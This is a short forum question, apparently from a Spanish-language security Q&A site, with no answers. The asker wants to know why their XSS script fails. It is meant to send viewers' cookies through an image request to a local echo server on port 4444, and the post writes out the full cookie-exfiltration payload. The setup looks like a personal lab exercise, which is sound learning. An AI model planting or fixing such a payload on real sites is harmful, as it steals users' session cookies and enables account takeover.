problema de sintaxis de script XSS

0

Tengo un servidor que se ejecuta en el puerto 4444 en localhost que simplemente hace eco de los mensajes que recibe.

Tengo un script JS incrustado en un mensaje que se supone que envía las cookies de quien lo mire.

Aquí está el script:

     <script>document.write("<img src=http://127.0.0.1:4444?c=" 
+ escape(document.cookie) + " >"); </script>

Sin embargo, esto no envía la información de la cookie al servidor. Nada se repite o se imprime en el lado del servidor. Sé que el servidor se está ejecutando normalmente porque ejecutar telnet localhost 4444 y escribir un mensaje devuelve el mensaje.

¿Hay algún problema con mi script?

    
pregunta vira 12.10.2015 - 05:07
fuente

0 respuestas

Lea otras preguntas en las etiquetas